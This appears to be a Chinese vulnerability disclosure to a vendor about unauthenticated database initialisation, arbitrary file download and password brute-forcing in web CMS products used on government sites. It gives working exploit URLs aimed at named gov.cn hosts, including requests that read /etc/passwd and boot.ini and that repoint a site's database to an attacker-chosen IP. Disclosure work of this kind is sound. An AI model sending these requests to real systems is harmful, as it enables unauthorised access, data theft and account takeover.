基本所有系统大部分版本都还存在的一个越权:
初始化数据库到指定IP数据库服务器去的,大部分系统大部分版本都是处于没有验证的状态。
给案例
Source:
http://www.gansu.gov.cn/source/setup/opr_initdb.jsp?dbip=1.1.1.1&db_port=1433&dbname=test&dbuser=admin123&dbpwd1=admin123&dbtype=2
Jiep:
http://www.gansu.gov.cn/jiep/setup/opr_initdb.jsp?dbip=1.1.1.1&db_port=1433&dbname=test&dbuser=admin123&dbpwd1=admin123&dbtype=2
Vipchat:
http://www.liaocheng.gov.cn/vipchat/setup/opr_initdb.jsp?dbip=1.1.1.1&db_port=1433&dbname=test&dbuser=admin123&dbpwd1=admin123&dbtype=2
LM
http://www.liaocheng.gov.cn/lm/setup/opr_initdb.jsp?dbip=1.1.1.1&db_port=1433&dbname=test&dbuser=admin123&dbpwd1=admin123&dbtype=2
JCMS & xxgk 任意文件下载
关键代码:
其中filename为绝对路径。
先看xxgk的案例:
http://xxgk.qidong.gov.cn/gov/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1
http://xxgk.tzhl.gov.cn/xxgk/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1
http://xxgk.qidong.gov.cn/gov/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1
再看JCMS的案例:
http://www.xwzf.gov.cn/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=1
http://www.huimin.gov.cn/jcms/m_5_9/downfile.jsp?filename=c:/boot.ini&savename=1
暴力破解1——某接口可以暴力破解用户名密码
http://www.gansu.gov.cn/xxgk/interface/web.jsp?userid=admin&password=#####
正确情况下的回显:
错误情况下的回显:
工具测试发了5000多个请求,没问题,可破解成功,错误是33b,正确的56b
Jcms也是有用到类似的代码的:
http://www.huimin.gov.cn/jcms/interface/web.jsp
暴力破解也是可行的。
暴力破解2——另一接口也可以暴力破解
http://www.gansu.gov.cn/xxgk/interface/verify.jsp
密码正确的情况:
错误的情况:
Jcms案例:
http://www.huimin.gov.cn/jcms/interface/verify.jsp
不再进行测试。
最后附送一处好像是越权的地方,厂商自己评估是否是开放给民众下载的通道:
http://www.gansu.gov.cn/xxgk/jcms_files/jcms1/web1/site/zfxxgk/downinfo.jsp